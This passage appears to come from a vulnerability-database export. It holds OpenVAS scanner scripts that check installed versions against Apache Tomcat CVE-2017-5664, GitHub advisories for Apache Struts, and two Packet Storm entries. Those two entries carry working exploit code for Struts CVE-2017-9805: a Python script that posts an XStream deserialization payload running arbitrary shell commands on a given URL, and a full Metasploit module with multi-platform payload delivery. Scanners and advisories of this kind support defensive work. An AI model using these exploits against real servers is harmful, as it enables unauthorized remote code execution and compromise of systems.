\"creation_date\", value: \"2017-06-22 00:00:00 +0200 (Thu, 22 Jun 2017)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2017/dsa-3891.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"tomcat8 on Debian Linux\");\n script_tag(name: \"insight\", value: \"Apache Tomcat implements the Java Servlet and the JavaServer Pages (JSP)\nspecifications from Oracle, and provides a 'pure Java' HTTP web\nserver environment for Java code to run.\");\n script_tag(name: \"solution\", value: \"For the oldstable distribution (jessie), this problem has been fixed\nin version 8.0.14-1+deb8u10.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 8.5.14-1+deb9u1.\n\nFor the testing distribution (buster), this problem has been fixed\nin version 8.5.14-2.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 8.5.14-2.\n\nWe recommend that you upgrade your tomcat8 packages.\");\n script_tag(name: \"summary\", value: \"Aniket Nandkishor Kulkarni discovered that in tomcat8, a servlet and\nJSP engine, static error pages used the original request's HTTP method\nto serve content, instead of systematically using the GET method. This\ncould under certain conditions result in undesirable results,\nincluding the replacement or removal of the custom error page.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libservlet3.1-java\", ver:\"8.5.14-1+deb9u1\", rls_regex:\"DEB9.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libservlet3.1-java-doc\", ver:\"8.5.14-1+deb9u1\", rls_regex:\"DEB9.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtomcat8-embed-java\", ver:\"8.5.14-1+deb9u1\", rls_regex:\"DEB9.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtomcat8-java\", ver:\"8.5.14-1+deb9u1\", rls_regex:\"DEB9.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat8\", ver:\"8.5.14-1+deb9u1\", rls_regex:\"DEB9.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat8-admin\", ver:\"8.5.14-1+deb9u1\", rls_regex:\"DEB9.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat8-common\", ver:\"8.5.14-1+deb9u1\", rls_regex:\"DEB9.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat8-docs\", ver:\"8.5.14-1+deb9u1\", rls_regex:\"DEB9.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat8-examples\", ver:\"8.5.14-1+deb9u1\", rls_regex:\"DEB9.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat8-user\", ver:\"8.5.14-1+deb9u1\", rls_regex:\"DEB9.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libservlet3.1-java\", ver:\"8.5.14-2\", rls_regex:\"DEB10.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libservlet3.1-java-doc\", ver:\"8.5.14-2\", rls_regex:\"DEB10.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtomcat8-embed-java\", ver:\"8.5.14-2\", rls_regex:\"DEB10.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtomcat8-java\", ver:\"8.5.14-2\", rls_regex:\"DEB10.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat8\", ver:\"8.5.14-2\", rls_regex:\"DEB10.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat8-admin\", ver:\"8.5.14-2\", rls_regex:\"DEB10.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat8-common\", ver:\"8.5.14-2\", rls_regex:\"DEB10.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat8-docs\", ver:\"8.5.14-2\", rls_regex:\"DEB10.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat8-examples\", ver:\"8.5.14-2\", rls_regex:\"DEB10.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat8-user\", ver:\"8.5.14-2\", rls_regex:\"DEB10.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libservlet3.1-java\", ver:\"8.0.14-1+deb8u10\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libservlet3.1-java-doc\", ver:\"8.0.14-1+deb8u10\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtomcat8-java\", ver:\"8.0.14-1+deb8u10\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat8\", ver:\"8.0.14-1+deb8u10\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat8-admin\", ver:\"8.0.14-1+deb8u10\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat8-common\", ver:\"8.0.14-1+deb8u10\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat8-docs\", ver:\"8.0.14-1+deb8u10\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat8-examples\", ver:\"8.0.14-1+deb8u10\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat8-user\", ver:\"8.0.14-1+deb8u10\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-07-24T12:57:59", "bulletinFamily": "scanner", "description": "Aniket Nandkishor Kulkarni discovered that in tomcat7, a servlet and\nJSP engine, static error pages used the original request", "modified": "2017-07-07T00:00:00", "published": "2017-06-22T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=703892", "id": "OPENVAS:703892", "title": "Debian Security Advisory DSA 3892-1 (tomcat7 - security update)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3892.nasl 6607 2017-07-07 12:04:25Z cfischer $\n# Auto-generated from advisory DSA 3892-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703892);\n script_version(\"$Revision: 6607 $\");\n script_cve_id(\"CVE-2017-5664\");\n script_name(\"Debian Security Advisory DSA 3892-1 (tomcat7 - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:04:25 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2017-06-22 00:00:00 +0200 (Thu, 22 Jun 2017)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2017/dsa-3892.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"tomcat7 on Debian Linux\");\n script_tag(name: \"insight\", value: \"Apache Tomcat implements the Java Servlet and the JavaServer Pages (JSP)\nspecifications from Sun Microsystems, and provides a 'pure Java' HTTP web\nserver environment for Java code to run.\");\n script_tag(name: \"solution\", value: \"For the oldstable distribution (jessie), this problem has been fixed\nin version 7.0.56-3+deb8u11.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 7.0.72-3.\n\nFor the testing distribution (buster), this problem has been fixed\nin version 7.0.72-3.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 7.0.72-3.\n\nWe recommend that you upgrade your tomcat7 packages.\");\n script_tag(name: \"summary\", value: \"Aniket Nandkishor Kulkarni discovered that in tomcat7, a servlet and\nJSP engine, static error pages used the original request's HTTP method\nto serve content, instead of systematically using the GET method. This\ncould under certain conditions result in undesirable results,\nincluding the replacement or removal of the custom error page.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libservlet3.0-java\", ver:\"7.0.72-3\", rls_regex:\"DEB9.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libservlet3.0-java-doc\", ver:\"7.0.72-3\", rls_regex:\"DEB9.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libservlet3.0-java\", ver:\"7.0.72-3\", rls_regex:\"DEB10.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libservlet3.0-java-doc\", ver:\"7.0.72-3\", rls_regex:\"DEB10.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libservlet3.0-java\", ver:\"7.0.56-3+deb8u11\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libservlet3.0-java-doc\", ver:\"7.0.56-3+deb8u11\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtomcat7-java\", ver:\"7.0.56-3+deb8u11\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat7\", ver:\"7.0.56-3+deb8u11\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat7-admin\", ver:\"7.0.56-3+deb8u11\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat7-common\", ver:\"7.0.56-3+deb8u11\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat7-docs\", ver:\"7.0.56-3+deb8u11\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat7-examples\", ver:\"7.0.56-3+deb8u11\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"tomcat7-user\", ver:\"7.0.56-3+deb8u11\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-05-29T18:34:15", "bulletinFamily": "scanner", "description": "This host is installed with Apache Tomcat\n and is prone to security bypass vulnerability.", "modified": "2019-05-10T00:00:00", "published": "2017-06-07T00:00:00", "id": "OPENVAS:1361412562310811141", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811141", "title": "Apache Tomcat Security Bypass Vulnerability (Linux)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_tomcat_security_bypass_vuln_lin.nasl 73877 2017-07-07 11:25:47 +0530 March$\n#\n# Apache Tomcat Security Bypass Vulnerability (Linux)\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:tomcat\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811141\");\n script_version(\"2019-05-10T11:41:35+0000\");\n script_cve_id(\"CVE-2017-5664\");\n script_bugtraq_id(98888);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-05-10 11:41:35 +0000 (Fri, 10 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-06-07 15:10:52 +0530 (Wed, 07 Jun 2017)\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_name(\"Apache Tomcat Security Bypass Vulnerability (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apache Tomcat\n and is prone to security bypass vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The error page mechanism of the Java Servlet\n Specification requires that, when an error occurs and an error page is\n configured for the error that occurred, the original request and response are\n forwarded to the error page. This means that the request is presented to the\n error page with the original HTTP method. If the error page is a static file,\n expected behaviour is to serve content of the file as if processing a GET request,\n regardless of the actual HTTP method. Tomcat's Default Servlet did not do this.\n Depending on the original request this could lead to unexpected and undesirable\n results for static error pages including, if the DefaultServlet is configured to\n permit writes, the replacement or removal of the custom error page\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker to\n exploit this issue to bypass certain security restrictions and perform\n unauthorized actions. This may lead to further attacks.\");\n\n script_tag(name:\"affected\", value:\"Apache Tomcat 9.0.0.M1 to 9.0.0.M20,\n Apache Tomcat 8.5.0 to 8.5.14,\n Apache Tomcat 8.0.0.RC1 to 8.0.43 and\n Apache Tomcat 7.0.0 to 7.0.77 on Linux\");\n\n script_tag(name:\"solution\", value:\"Upgrade to version 9.0.0.M21, or 8.5.15,\n or 8.0.44, or 7.0.78 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://lists.apache.org/thread.html/a42c48e37398d76334e17089e43ccab945238b8b7896538478d76066@%3Cannounce.tomcat.apache.org%3E\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web Servers\");\n script_dependencies(\"gb_apache_tomcat_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"apache/tomcat/detected\", \"Host/runs_unixoide\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(isnull(tomPort = get_app_port(cpe:CPE)))\n exit(0);\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:tomPort, exit_no_version:TRUE))\n exit(0);\n\nappVer = infos[\"version\"];\npath = infos[\"location\"];\n\nif(appVer =~ \"^[7-9]\\.\")\n{\n if(version_in_range(version:appVer, test_version:\"8.5.0\", test_version2:\"8.5.14\")){\n fix = \"8.5.15\";\n }\n\n else if(version_in_range(version:appVer, test_version:\"8.0.0.RC1\", test_version2:\"8.0.43\")){\n fix = \"8.0.44\";\n }\n\n else if(version_in_range(version:appVer, test_version:\"7.0\", test_version2:\"7.0.77\")){\n fix = \"7.0.78\";\n }\n\n else if(version_in_range(version:appVer, test_version:\"9.0.0.M1\", test_version2:\"9.0.0.M20\")){\n fix = \"9.0.0.M21\";\n }\n\n if(fix)\n {\n report = report_fixed_ver(installed_version:appVer, fixed_version:fix, install_path:path);\n security_message(data:report, port:tomPort);\n exit(0);\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "github": [{"lastseen": "2019-11-21T12:51:06", "bulletinFamily": "software", "description": "When using a Spring AOP functionality to secure Struts actions it is possible to perform a DoS attack. Solution is to upgrade to Apache Struts version 2.5.12 or 2.3.33.", "modified": "2019-07-03T21:02:03", "published": "2018-10-16T19:37:07", "id": "GHSA-8MR5-H28G-36QX", "href": "https://github.com/advisories/GHSA-8mr5-h28g-36qx", "title": "Moderate severity vulnerability that affects org.apache.struts:struts2-core", "type": "github", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-11-21T12:51:06", "bulletinFamily": "software", "description": "The REST Plugin in Apache Struts 2.1.2 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads.", "modified": "2019-07-03T21:02:04", "published": "2018-10-16T19:37:56", "id": "GHSA-GG9M-FJ3V-R58C", "href": "https://github.com/advisories/GHSA-gg9m-fj3v-r58c", "title": "Moderate severity vulnerability that affects org.apache.struts:struts2-rest-plugin", "type": "github", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2017-09-08T05:08:41", "bulletinFamily": "exploit", "description": "", "modified": "2017-09-07T00:00:00", "published": "2017-09-07T00:00:00", "href": "https://packetstormsecurity.com/files/144050/Apache-Struts-2.5.12-XStream-Remote-Code-Execution.html", "id": "PACKETSTORM:144050", "title": "Apache Struts 2.5.12 XStream Remote Code Execution", "type": "packetstorm", "sourceData": "`# Exploit Title: Struts 2.5 - 2.5.12 REST Plugin XStream RCE \n# Google Dork: filetype:action \n# Date: 06/09/2017 \n# Exploit Author: Warflop \n# Vendor Homepage: https://struts.apache.org/ \n# Software Link: http://mirror.nbtelecom.com.br/apache/struts/2.5.10/struts-2.5.10-all.zip \n# Version: Struts 2.5 a Struts 2.5.12 \n# Tested on: Struts 2.5.10 \n# CVE : 2017-9805 \n \n#!/usr/bin/env python3 \n# coding=utf-8 \n# ***************************************************** \n# Struts CVE-2017-9805 Exploit \n# Warflop (http://securityattack.com.br/) \n# Greetz: Pimps & G4mbl3r \n# ***************************************************** \nimport requests \nimport sys \n \ndef exploration(command): \n \nexploit = ''' \n<map> \n<entry> \n<jdk.nashorn.internal.objects.NativeString> \n<flags>0</flags> \n<value class=\"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\"> \n<dataHandler> \n<dataSource class=\"com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource\"> \n<is class=\"javax.crypto.CipherInputStream\"> \n<cipher class=\"javax.crypto.NullCipher\"> \n<initialized>false</initialized> \n<opmode>0</opmode> \n<serviceIterator class=\"javax.imageio.spi.FilterIterator\"> \n<iter class=\"javax.imageio.spi.FilterIterator\"> \n<iter class=\"java.util.Collections$EmptyIterator\"/> \n<next class=\"java.lang.ProcessBuilder\"> \n<command> \n<string>/bin/sh</string><string>-c</string><string>'''+ command +'''</string> \n</command> \n<redirectErrorStream>false</redirectErrorStream> \n</next> \n</iter> \n<filter class=\"javax.imageio.ImageIO$ContainsFilter\"> \n<method> \n<class>java.lang.ProcessBuilder</class> \n<name>start</name> \n<parameter-types/> \n</method> \n<name>foo</name> \n</filter> \n<next class=\"string\">foo</next> \n</serviceIterator> \n<lock/> \n</cipher> \n<input class=\"java.lang.ProcessBuilder$NullInputStream\"/> \n<ibuffer/> \n<done>false</done> \n<ostart>0</ostart> \n<ofinish>0</ofinish> \n<closed>false</closed> \n</is> \n<consumed>false</consumed> \n</dataSource> \n<transferFlavors/> \n</dataHandler> \n<dataLen>0</dataLen> \n</value> \n</jdk.nashorn.internal.objects.NativeString> \n<jdk.nashorn.internal.objects.NativeString reference=\"../jdk.nashorn.internal.objects.NativeString\"/> \n</entry> \n<entry> \n<jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/> \n<jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/> \n</entry> \n</map> \n''' \n \n \nurl = sys.argv[1] \n \nheaders = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0', \n'Content-Type': 'application/xml'} \n \nrequest = requests.post(url, data=exploit, headers=headers) \nprint request.text \n \nif len(sys.argv) < 3: \nprint ('CVE: 2017-9805 - Apache Struts2 Rest Plugin Xstream RCE') \nprint ('[*] Warflop - http://securityattack.com.br') \nprint ('[*] Greatz: Pimps & G4mbl3r') \nprint ('[*] Use: python struts2.py URL COMMAND') \nprint ('[*] Example: python struts2.py http://sitevulnerable.com/struts2-rest-showcase/orders/3 id') \nexit(0) \nelse: \nexploration(sys.argv[2]) \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/144050/apachestruts25-exec.txt"}, {"lastseen": "2017-09-08T05:08:41", "bulletinFamily": "exploit", "description": "", "modified": "2017-09-07T00:00:00", "published": "2017-09-07T00:00:00", "href": "https://packetstormsecurity.com/files/144034/Apache-Struts-2-REST-Plugin-XStream-Remote-Code-Execution.html", "id": "PACKETSTORM:144034", "title": "Apache Struts 2 REST Plugin XStream Remote Code Execution", "type": "packetstorm", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::Powershell \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache Struts 2 REST Plugin XStream RCE', \n'Description' => %q{ \nApache Struts versions 2.5 through 2.5.12 using the REST plugin are \nvulnerable to a Java deserialization attack in the XStream library. \n}, \n'Author' => [ \n'Man Yue Mo', # Vulnerability discovery \n'wvu' # Metasploit module \n], \n'References' => [ \n['CVE', '2017-9805'], \n['URL', 'https://struts.apache.org/docs/s2-052.html'], \n['URL', 'https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement'], \n['URL', 'https://github.com/mbechler/marshalsec'] \n], \n'DisclosureDate' => 'Sep 5 2017', \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'python', 'linux', 'win'], \n'Arch' => [ARCH_CMD, ARCH_PYTHON, ARCH_X86, ARCH_X64], \n'Privileged' => false, \n'Targets' => [ \n['Unix (In-Memory)', \n'Platform' => 'unix', \n'Arch' => ARCH_CMD \n], \n['Python (In-Memory)', \n'Platform' => 'python', \n'Arch' => ARCH_PYTHON \n], \n['PowerShell (In-Memory)', \n'Platform' => 'win', \n'Arch' => [ARCH_X86, ARCH_X64] \n], \n['Linux (Dropper)', \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64] \n], \n['Windows (Dropper)', \n'Platform' => 'win', \n'Arch' => [ARCH_X86, ARCH_X64] \n] \n], \n'DefaultTarget' => 0 \n)) \n \nregister_options([ \nOpt::RPORT(8080), \nOptString.new('TARGETURI', [true, 'Path to Struts action', '/struts2-rest-showcase/orders/3']) \n]) \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => target_uri.path, \n'ctype' => 'application/xml', \n'data' => random_crap \n) \n \nif res && res.code == 500 && res.body.include?('xstream') \nCheckCode::Appears \nelse \nCheckCode::Safe \nend \nend \n \ndef exploit \ncase target.name \nwhen /Unix/, /Python/, /PowerShell/ \nexecute_command(payload.encoded) \nelse \nexecute_cmdstager \nend \nend \n \ndef execute_command(cmd, opts = {}) \ncase target.name \nwhen /Unix/, /Linux/ \ncmd = %W{/bin/sh -c #{cmd}} \nwhen /Python/ \ncmd = %W{python -c #{cmd}} \nwhen /PowerShell/ \n# This shit doesn't work yet \nrequire 'pry'; binding.pry \ncmd = %W{cmd.exe /c #{cmd_psh_payload(cmd, payload.arch, remove_comspec: true)}} \nwhen /Windows/ \ncmd = %W{cmd.exe /c #{cmd}} \nend \n \n# Encode each command argument with HTML entities \ncmd.map! { |arg| Rex::Text.html_encode(arg) } \n \nsend_request_cgi( \n'method' => 'POST', \n'uri' => target_uri.path, \n'ctype' => 'application/xml', \n'data' => xstream_payload(cmd) \n) \nend \n \n# java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.XStream ImageIO \ndef xstream_payload(cmd) \n# XXX: <spillLength> and <read> need to be removed for Windows \n<<EOF \n<map> \n<entry> \n<jdk.nashorn.internal.objects.NativeString> \n<flags>0</flags> \n<value class=\"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\"> \n<dataHandler> \n<dataSource class=\"com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource\"> \n<is class=\"javax.crypto.CipherInputStream\"> \n<cipher class=\"javax.crypto.NullCipher\"> \n<initialized>false</initialized> \n<opmode>0</opmode> \n<serviceIterator class=\"javax.imageio.spi.FilterIterator\"> \n<iter class=\"javax.imageio.spi.FilterIterator\"> \n<iter class=\"java.util.Collections$EmptyIterator\"/> \n<next class=\"java.lang.ProcessBuilder\"> \n<command> \n<string>#{cmd.join('</string><string>')}</string> \n</command> \n<redirectErrorStream>false</redirectErrorStream> \n</next> \n</iter> \n<filter class=\"javax.imageio.ImageIO$ContainsFilter\"> \n<method> \n<class>java.lang.ProcessBuilder</class> \n<name>start</name> \n<parameter-types/> \n</method> \n<name>#{random_crap}</name> \n</filter> \n<next class=\"string\">#{random_crap}</next> \n</serviceIterator> \n<lock/> \n</cipher> \n<input class=\"java.lang.ProcessBuilder$NullInputStream\"/> \n<ibuffer></ibuffer> \n<done>false</done> \n<ostart>0</ostart> \n<ofinish>0</ofinish> \n<closed>false</closed> \n</is> \n<consumed>false</consumed> \n</dataSource> \n<transferFlavors/> \n</dataHandler> \n<dataLen>0</dataLen> \n</value> \n</jdk.nashorn.internal.objects.NativeString> \n<jdk.nashorn.internal.objects.NativeString reference=\"../jdk.nashorn.internal.objects.NativeString\"/> \n</entry> \n<entry> \n<jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/> \n<jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/> \n</entry> \n</map> \nEOF \nend \n \ndef random_crap \nRex::Text.rand_text_alphanumeric(rand(42) + 1) \nend \n \nend \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": 